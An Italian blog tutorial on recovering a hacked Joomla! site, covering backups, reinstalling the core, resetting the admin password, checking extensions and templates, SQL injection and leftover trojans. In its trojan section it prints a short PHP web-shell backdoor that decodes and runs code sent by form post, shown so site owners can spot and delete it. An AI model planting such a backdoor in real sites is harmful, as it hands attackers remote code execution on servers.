Ripristinare Joomla! dopo un attacco (Joomla hacked)

Joomla hackedPuò capitare che il nostro sito Joomla! venga messo ko da un hacker: come lo si ripristina? Come ci si accorge che è successo qualcosa? La condizione tipica è che al posto del sito appaia una pagina con la scritta hacked by *** o che l’antivirus segnali strane cose quando vi collegate al sito, oppure che il browser si segnali il vostro sito come contenente codice malevolo.
Può anche accadere che non riusciate a collegarvi all’amministrazione con la vostra password.

Vediamo come si può ripristinare la ‘salute’ del nostro sito Joomla! dopo un hacking.

Se avete un backup siete in una buona situazione, altrimenti potreste avere dei seri problemi.

1.
Come prima cosa scaricate il sito e ed il dump del db in modo di avere un back up della situazione attuale.

Fate riferimento a questo articolo
http://wiki.joomla.it/index.php?title=Trasferimento_siti_web_Joomla_da_locale_a_remoto_e_viceversa
per le istruzioni su come eseguire le due operazioni.


Se ne avete la possibilità salvate anche i files di log di apache e dello ftp. Tutto ciò vi servirà per capire come è potuto avvenire l’attacco.
Tenete presente che la quasi totalità degli hack è dovuta ad estensioni (componenti, moduli, plugins) non aggiornate, nella mia esperienza gli attacchi brute force per trovare le password li ho visti solo nei films...

2.
Se avete un backup recente del sito ripristinate il file system. Con recente intendo posteriore rispetto a qualsiasi installazione di componenti. Ciò servirà a ripristinare i files contenuti nelle estensioni installate. Se non avete il back up ricordatevi che i files installati dalle estensioni NON saranno sicuri.
Nell’effettuare il ripristino dei files state attenti a non sovrascrivere eventuali immagini, quindi occhio alla cartella /images/…


3.
Scaricate l'ultima versione di joomla e caricatela sul sito hackerato tramite ftp, ricordatevi di non caricare la directory installation.


Attenzione dovete scaricare l’ultimo rilascio della versione in uso: non potete installare la versione 1.5 su una precedente installazione della 1.0.

Nota: il sito è stato compromesso e quindi NON potete fidarvi più di alcun file, pertanto non è sufficiente caricare solo il file di aggiornamento.

I contenuti del sito sono mantenuti nel database, pertanto il ripristino di joomla non comporta alcuna perdita di informazioni. Possono tuttavia dare problemi quelle estensioni, poche per il vero, che agiscono come hack del core di joomla.

4.
Se non riuscite ad accedere all’amministrazione ripristinate la pw di admin, se necessario, seguendo questa quida:
http://wiki.joomla.it/index.php?title=Recupero_password_admin
Un’aggiunta alla guida: verificate anche che il campo block sia impostato a 0, se è impostato ad 1 non potrete accedere.

5.
Se non avete potuto fare il ripristino da backup accedete al back office e cambiate il template impostando uno di quelli standard di joomla.
Non riattivate il template finché non avrete avuto modo di verificarne il codice. Il template è un programma PHP, pertanto è assolutamente necessario essere sicuri del codice contenuto prima di mandarlo in esecuzione.

6.
Verificate tutti i contenuti (testi vari) e controllate che non contengano javascript o codici malevoli, poi controllate tutte le estensioni installate, provvedendo, ove necessario, all'aggiornamento.


Nota importante: non tutte le estensioni prevedono procedure di aggiornamento, in questo caso è consigliabile disinstallare l’estensione e ricaricala.
Questa operazione richiede una certa conoscenza della programmazione, dovrete infatti verificare che la procedura di disinstallazione non cancelli le tabelle create nel db (ciò al fine di non perdere tutti i dati) e nel caso modificare il codice per conservare le tabelle.

7.
Effettuate un back up di sito e db on line.

 

SQL Injection e siti Joomla!

Joomla! è abbastanza ben protetto da attacchi di tipo SQL Injection tuttavia la stessa affermazione non può essere fatta per parecchie delle migliaia di estensioni disponibili il cui uso rende un sito Joomla vulnerabile a questo tipo di attacchi.

Uno degli avvenimenti che vi possono avvisare che stia accadendo qualcosa di brutto è la ricezione di mail di sistema (le email inviate automaticamente dal sito Joomla all'amministratore) con la richiesta di reset della password: in particolare se si tratta di quella di admin. In questi casi è doveroso un intervento di controllo il prima possibile.

Come evitare questi problemi? La prima regola è la prudenza: verificate attentamente l'estensione che volete installare, il supporto, l'aggiornamento e la frequenza di rilascio di patch di sicurezza. La seconda regola è la moderazione: non installate qualsiasi cosa sia possibile installare, ma selezionate le estensioni Joomla! che sono indispensabili per vostro sito e limitatevi a quelle. Ricordatevi sempre la massima di Henry Ford: "tutto quello che non c'è non può guastarsi"

Una regola pragmatica ed efficacie è quella di non usare mail il prefisso di default delle tabelle jos_ per l'installazione di un sito Joomla!

Leggendo le informazioni contenute nei logs di sistema si vede che quasi tutti gli attacchi sono volti ad alterare la tabella jos_users ( e non #__users ) pertanto il solo uso di un prefisso diverso rende questi attacchi inefficaci.

 

Cavalli di troia all'interno del sito

Sovrascrivere il sito va bene, ma meglio sarebbe cancellarne prima il contenuto, a parte le immagini, perché è possibile, se non probabile, che chi è riuscito ad accedere si sia lasciato dei 'cavalli di troia' per poter riguadagnare velocemente l'accesso qualora fosse stato scoperto l'hack.

Spesso questi programmi vengono lasciati qua e la tra le cartelle, e, quindi, se vi trovate uno strano file di pochi bites, che sostanzialmente contiene solo:

<?php
eval (base64_decode($_POST["php"]));
?>


sappiate che il vostro sito è stato vittima di un hack, ovvero qualcuno è riuscito ad entrare ed ha lasciato questo file per poter agevolmente mandare in esecuzione un codice php arbitrario sul vostro sito semplicemente inviandolo tramite una pagina form.
Questo file può assumere vari nomi (pop, post, google, mailcheck) e trovarsi in una o più directories, root compresa; pertanto è buona norma controllare ciclicamente le varie cartelle alla ricerca di files le cui date non siano coerenti con quelle dell'installazione di Joomla o delle sue estensioni.

Nota: questo è solo un esempio dei tanti possibili trojans che sono utilizzabili.

Questi files devono essere cancellati, infatti non prendendo il posto di alcun file originale di Joomla! non basta sovrascrivere l'installazione: altrimenti il sito resterà soggetto ad hacks.

 

Aumentare la sicurezza di Joomla! e proteggere il sito

Dopo la faticosa opera di ripristino del sito è fondamentale capire:

  1. come sia avvenuto l'attacco, in modo che non possa ripetersi
  2. come fare per evitare altri attacchi.

Sappiate che la triste verità è che nessun sito è sicuro, comunque è giusto fare tutto il possibile per aumentare la sicurezza. Le due attività citate richiedono professionalità e competenza, e difficilmente possono essere spiegate in poche righe, ma neanche in molte pagine: se il sito fa capo ad una attività professionale è opportuno rivolgersi ad un professionista.

Peraltro invito alla lettura di quanto consigliato dagli stessi autori di Joomla! nella security checklist.


Ed ora ricordatevi di tenere aggiornato tanto il core (ovvero Joomla!) che le varie estensioni.

Commenti   

+1 #2 Guest 2012-12-03 14:59
Si può fare lo stesso con joomla 2.5?

==Risposta
i principi sono gli stessi, ovviamente qualche dettaglio può variare.

ciao,
marco
Citazione
+3 #1 Guest 2012-09-04 12:16
Maledetti hackers!
Citazione

Aggiungi commento

Please note: URL in text are not linked and site address is only for internal use.

Comments are human checked. All spam will be removed, so don't waste your time!

Codice di sicurezza
Aggiorna

L'estate si avvicina hai già trovato l'albergo per le vacanze? cerca un albergo al mare o un hotel in montagna ove trascorrere le tue vacanze.